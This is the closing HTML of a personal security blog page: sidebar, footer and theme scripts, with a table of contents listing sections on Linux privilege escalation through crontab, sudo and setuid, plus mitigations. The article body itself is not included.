    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Shad0w</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">12</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">5</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/PeteLing" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
            </div>
          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Linux常见提权问题"><span class="nav-number">1.</span> <span class="nav-text">Linux常见提权问题</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Linux-crontab提权"><span class="nav-number">1.1.</span> <span class="nav-text">Linux crontab提权</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Crontab文件覆写"><span class="nav-number">1.1.1.</span> <span class="nav-text">Crontab文件覆写</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#环境搭建"><span class="nav-number">1.1.1.1.</span> <span class="nav-text">环境搭建</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#模拟cron计划任务"><span class="nav-number">1.1.1.2.</span> <span class="nav-text">模拟cron计划任务</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#提权"><span class="nav-number">1.1.1.3.</span> <span class="nav-text">提权</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#提权条件"><span class="nav-number">1.1.1.4.</span> <span class="nav-text">提权条件</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Crontab-Tar-Wildcard注入"><span class="nav-number">1.1.2.</span> <span class="nav-text">Crontab Tar Wildcard注入</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#模拟cron计划任务-1"><span class="nav-number">1.1.2.1.</span> <span class="nav-text">模拟cron计划任务</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#提权-1"><span class="nav-number">1.1.2.2.</span> <span class="nav-text">提权</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#防护措施"><span class="nav-number">1.1.2.3.</span> <span class="nav-text">防护措施</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#sudo提权"><span class="nav-number">1.2.</span> <span class="nav-text">sudo提权</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#sudo简介"><span class="nav-number">1.2.1.</span> <span class="nav-text">sudo简介</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sudo提权-1"><span class="nav-number">1.2.2.</span> <span class="nav-text">sudo提权</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#sudo执行原理"><span class="nav-number">1.2.2.1.</span> <span class="nav-text">sudo执行原理</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#sudo提权-2"><span class="nav-number">1.2.2.2.</span> <span class="nav-text">sudo提权</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sudo缓存"><span class="nav-number">1.2.3.</span> <span class="nav-text">sudo缓存</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sudo提权缓解"><span class="nav-number">1.2.4.</span> <span class="nav-text">sudo提权缓解</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#setuid-amp-setgid-权限提升"><span class="nav-number">1.3.</span> <span class="nav-text">setuid &amp; setgid 权限提升</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Linux-SETUID机制"><span class="nav-number">1.3.1.</span> <span class="nav-text">Linux SETUID机制</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#利用suid可执行程序提权"><span class="nav-number">1.3.2.</span> <span class="nav-text">利用suid可执行程序提权</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#缓解措施"><span class="nav-number">1.3.3.</span> <span class="nav-text">缓解措施</span></a></li></ol></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Shad0w</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
